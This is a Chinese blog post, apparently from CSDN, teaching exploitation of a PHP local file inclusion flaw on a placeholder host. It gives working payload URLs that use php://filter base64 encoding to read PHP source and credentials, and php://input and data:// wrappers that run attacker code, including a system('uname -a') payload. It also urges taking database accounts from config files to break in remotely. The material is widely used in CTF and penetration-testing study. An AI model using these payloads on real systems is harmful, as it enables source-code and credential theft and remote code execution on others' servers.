通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码

最新推荐文章于 2023-06-28 21:21:02 发布
最新推荐文章于 2023-06-28 21:21:02 发布
阅读量3.3w 收藏 34
点赞数 6
分类专栏: web安全 文章标签: LFI

PHP LFI读php文件源码以及直接post webshell

假设如下一个场景

(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞)

(2) 但是你没有地方可以upload你的webshell代码

(3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花)

(4) 如果你能读取到config.php之类文件 或许可以直接拿到数据库账号远程入侵进去

【现在的问题是】 LFI如何读取到php文件的源码?

于是给大家做个演示 如果我正常用LFI去读/sqli/db.php文件 是无法读取它的源码 它会被当做php文件被执行

http://vulnerable/fileincl/example1.php?page=../sqli/db.php

这样做可以把指定php文件的源码以base64方式编码并被显示出来

http://vulnerable/fileincl/example1.php?page=php://filter/read=convert.base64-encode/resource=../sqli/db.php

/sqli/db.php源码base64编码后的内容显示如下

PD9waHAgCiAgJGxuayA9IG15c3FsX2Nvbm5lY3QoImxvY2FsaG9zdCIsICJwZW50ZXN0ZXJsYWIiLCAicGVudGVzdGVybGFiIik7CiAgJGRiID0gbXlzcWxfc2VsZWN0X2RiKCdleGVyY2lzZXMnLCAkbG5rKTsKPz4K 然后我们再去进行base64解码 解码后/sqli/db.php文件的源码一览无遗

看上去好像很厉害的样子…… 但是 =_,=||~ 再继续看下文~

******************* 我是邪恶的分割线 *******************

被 @扣子牛 bs了一番 又学到新的小技巧

【技巧】php://input 和 data:

php://input详情可以参考

http://zerofreak.blogspot.jp/2012/04/lfi-exploitation-via-phpinput-shelling.html

【条件】在allow_url_include = On 且 PHP >= 5.2.0

【优势】直接POST php代码并执行

【鸡肋】在allow_url_include = On 传说中就可以直接RFI了 不过没有vps的童鞋可以这样玩比较方便

在上面提到的同一个LFI漏洞点 我们又要来爆它一次菊花

http://vulnerable/fileincl/example1.php?page=intro.php

访问如下URL并用burp直接修改HTTP包 追加php命令代码

1
http://vulnerable/fileincl/example1.php?page=php://input

然后某君再一次被爆菊 >_<!~ (对不起~)

再换几种姿势继续  data: 的方式

1http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=
2http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk7Lyo=
3http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system(“uname -a”);?>

剩下的大家再继续YY吧~

由于时间关系 我也木有时间去深入了解其原理

为了Hacker精神建议大家去深入研究下 >_<!~

outputMaker
关注
  • 6
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sun.misc.BASE64Encoder源码及jar包
07-26
sun.misc.BASE64Encoder源码及jar包
http://bbs.hn87.com/read.php?tid=1451000&u=2121432
10-24
eval解密.htm <script> a=62; function encode() { var code = document.getElementById('code').value; code = code.replace(/[\r\n]+/g, ''); code = code.replace(/'/g, "\\'"); var tmp = code.match(/\b(\w+)\b/g); tmp.sort(); var dict = []; var i, t = ''; for(var i=0; i<tmp.length; i++) { if(tmp[i] != t) dict.push(t = tmp[i]); } var len = dict.length; var ch; for(i=0; i<len; i++) { ch = num(i); code = code.replace(new RegExp('\\b'+dict[i]+'\\b','g'), ch); if(ch == dict[i]) dict[i] = ''; } document.getElementById('code').value = "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}(" + "'"+code+"',"+a+","+len+",'"+ dict.join('|')+"'.split('|'),0,{}))"; } function num(c) { return(c<a?'':num(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36)); } function run() { eval(document.getElementById('code').value); } function decode() { var code = document.getElementById('code').value; code = code.replace(/^eval/, ''); document.getElementById('code').value = eval(code); } </script> <textarea id=code cols=80 rows=20></textarea> <br> <input type=button onclick=encode() value=编码> <input type=button onclick=run() value=执行> <input type=button onclick=decode() value=解码>
谈一谈php://filter的妙用
kexin178的博客
01-29 159
原文来源:https://www.leavesongs.com/PENETRATION/php-filter-magic.html php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,没想到被三个白帽的一题抢先用了,我也就只好提前分享一下。 XXE中的使用 php://filter之前最常出镜的地方是XXE。由于XXE漏洞的特殊性,我们在读取HTML、PHP等文.
理解php://filter用处
李二胖的博客
06-28 188
=为字符串拼接使用,在’<?>'后所有代码均不执行,因为提前有了个exit的动作。使用file=php://filter/write=convert.base64-decode/resource=flag.phpphp文件内部分内容类似于注释等内容无法在界面中展示出来,使用php://filter可以实现文件的取,另外如果直接读取文件也同样无法读取全部内容,因此使用base64加密的方式将全部内容输出出来。开始做一些简单的web题目,遇到的第一个题目[ACTF2020 新生赛]Include。
php://filter 的使用
热门推荐
hhh
09-03 2万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
浅谈 filter伪协议的特性
qq_64201116的博客
07-22 2342
对我来说,我以前对filter伪协议不甚了解,这次接触了这一题,就得主动去更加深入地了解一下filter伪协议了。以前呢就知道php//filter/read=convert.base64-encode/resource=[文件名]这干瘪瘪的一套,用就完了,现在看来深入了解是很有必要的。......
PHP伪协议filter详解,php://filter协议过滤器
wangyuxiang946的博客
06-12 1万+
PHP://filter协议 PHP filter 过滤器
[PHP底层]关于php://filter的分析
Y4tacker的博客
11-08 1897
文章目录写在前面关于php://filter的处理的一些简单解释php://filter常规流程分析关于exp的分析题外话 写在前面 慢慢不太想写博客了,很多东西都忙不过来,学的很多,今天抽出空来还是督促自己写一篇,灵感来源于刚刚在网上看到的一篇wp,https://xz.aliyun.com/t/10446,不得不说现在比赛可真多哈,小伙伴们也别太经常打,多做点实际的东西 关于php://filter的处理的一些简单解释 这里面呢,有几个比较关键的,一个是需要能获取到文件流(也就是我们后面常常写的reso
PHP安全 [伪协议]
weixin_45253622的博客
05-18 839
PHP安全 [伪协议] file://协议 ​http://协议 php://协议 zip:// bzip2:// zlib://协议 data://协议 phar:// 协议 首先在\DVWA-master\vulnerabilities\fi\目录下新建1.txt 2.txt 3.zip方便环境测试。 file://协议 file协议主要用于访问本地计算机中的文件,也就是用于访问本地文件系统,且不受allow_url_fopen与allow_url_include的影响..
PHP-伪协议
摘星怪sec的blog
04-25 3335
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
base64-arraybuffer:将base64数据编码解码为ArrayBuffers
05-02
base64-arraybuffer 将base64数据编码/解码为ArrayBuffers 入门 使用以下命令安装模块: npm install base64-arraybuffer 原料药 该库在与ArrayBuffers之间对base64进行编码和解码 encode(buffer) -将ArrayBuffer...
JSONLab: a toolbox to encode/decode JSON files 源码
07-16
A toolbox to encode/decode JSON/UBJSON/MessagePack files in MATLAB/Octave JSONLab is a free and open-source JSON/UBJSON/MessagePack encoder and decoder written in the native MATLAB language. It can be...
b64 -- Base64 Encode/Decode Utility-开源
04-25
base64 RFC1113 Vanilla ANSI-C代码,用于便携式独立文件编码/解码实用程序。 在2001年,我要求人们“帮我打破它!” 从那时起,十多年后,该代码一直保持不变,并在全球范围内广泛用于生产。 它已移植到所有主要...
base64 转文件_PHP伪协议与文件包含
weixin_40003780的博客
11-27 1285
PHP伪协议与文件包含PHP伪协议与文件包含php:// 协议php://inputphp://filterdata:// 协议file:// 协议zip://、bzip2://、zlib://协议zip://协议bzip2://协议zlib://协议phar://伪协议文件包含漏洞(File Inclusion)文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器...
PHP伪协议详解
m0_67401228的博客
08-02 1351
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
php7过滤,转换过滤器 - PHP 7 中文文档
weixin_34790159的博客
04-14 154
转换过滤器如同 string.* 过滤器,convert.* 过滤器的作用就和其名字一样。转换过滤器是 PHP 5.0.0 添加的。对于指定过滤器的更多信息,请参考该函数的手册页。convert.base64-encodeconvert.base64-decode使用这两个过滤器等同于分别用[base64_encode()](php7/function.base64-encode)和[base6...
BUUCTF 个人做题记录【6-24】
qq_61620566的博客
06-24 618
学习笔记,大佬勿喷
Python源码-数学美之樱花.py
最新发布
05-12
Python源码-数学美之樱花
php://filter/read=convert.base64-encode/resource=使用场景
08-29
引用和提到了使用php://filter/read=convert.base64-encode/resource=来访问数据流并将其转换为base64编码。这个功能可以在一些特殊场景下使用,比如在文件包含漏洞或路径遍历漏洞中,通过构造恶意的URL参数来读取服务器上的文件内容。 在引用中的示例中,我们可以看到通过构造URL参数php://filter/read=convert.base64-encode/resource=../sqli/db.php来读取sqli目录下的db.php文件内容,并且将其以base64编码的形式返回。 因此,php://filter/read=convert.base64-encode/resource=可以用于读取服务器上的文件内容,并将其转换为base64编码后返回。这在一些特定的场景中可能是有用的,比如进行文件包含漏洞的利用或进行路径遍历漏洞的探测。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [PHP伪协议filter详解,php://filter协议过滤器](https://blog.csdn.net/wangyuxiang946/article/details/131149171)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [通过php://filter/read=convert.base64-encode/resource= 利用LFI查看源码](https://blog.csdn.net/weixin_32446485/article/details/115546564)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值